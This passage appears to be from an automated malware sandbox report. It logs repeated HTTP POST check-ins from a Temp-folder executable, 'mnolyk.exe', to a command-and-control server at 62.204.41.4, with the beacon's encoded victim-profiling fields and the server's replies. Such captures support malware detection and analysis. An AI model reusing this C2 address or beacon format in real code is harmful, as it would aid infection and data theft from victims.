                                                                    553 | 192.168.2.3 | 50256 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:59.079103947 CET | 752 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:59.144504070 CET | 753 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:59 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    554 | 192.168.2.3 | 50257 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:59.313801050 CET | 753 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:59.379992962 CET | 754 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:59 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    555 | 192.168.2.3 | 50258 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:59.548026085 CET | 754 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:59.612236977 CET | 755 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:59 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    556 | 192.168.2.3 | 50259 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:59.785012007 CET | 755 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:59.849739075 CET | 756 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:59 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    557 | 192.168.2.3 | 50260 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:34:00.035520077 CET | 756 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:34:00.102188110 CET | 757 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:34:00 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    558 | 192.168.2.3 | 50261 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:34:00.284821987 CET | 757 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:34:00.348800898 CET | 758 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:34:00 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    559 | 192.168.2.3 | 50262 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:34:00.517158031 CET | 758 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:34:00.579685926 CET | 759 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:34:00 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    56 | 192.168.2.3 | 49758 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:30.574105978 CET | 257 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:30.637723923 CET | 257 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:30 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    560 | 192.168.2.3 | 50263 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:34:00.750617981 CET | 759 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:34:00.814040899 CET | 760 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:34:00 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    561 | 192.168.2.3 | 50264 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:34:01.016917944 CET | 760 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:34:01.083281040 CET | 761 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:34:01 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    562 | 192.168.2.3 | 50265 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:34:01.268881083 CET | 761 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:34:01.334364891 CET | 762 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:34:01 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    563 | 192.168.2.3 | 50266 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:34:01.503734112 CET | 762 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:34:01.570391893 CET | 763 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:34:01 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    564 | 192.168.2.3 | 50267 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:34:01.755474091 CET | 763 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:34:01.818662882 CET | 764 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:34:01 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    565 | 192.168.2.3 | 50268 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:34:02.000197887 CET | 764 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:34:02.066241980 CET | 765 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:34:02 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    566 | 192.168.2.3 | 50269 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:34:02.235624075 CET | 765 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:34:02.298657894 CET | 766 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:34:02 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    567 | 192.168.2.3 | 50270 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:34:02.469353914 CET | 766 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:34:02.533246040 CET | 767 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:34:02 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    568 | 192.168.2.3 | 50271 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:34:02.703342915 CET | 767 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:34:02.766514063 CET | 768 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:34:02 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    569 | 192.168.2.3 | 50272 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:34:02.938055992 CET | 768 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:34:03.001113892 CET | 769 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:34:02 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    57 | 192.168.2.3 | 49759 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:30.808118105 CET | 258 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:30.872117996 CET | 258 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:30 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


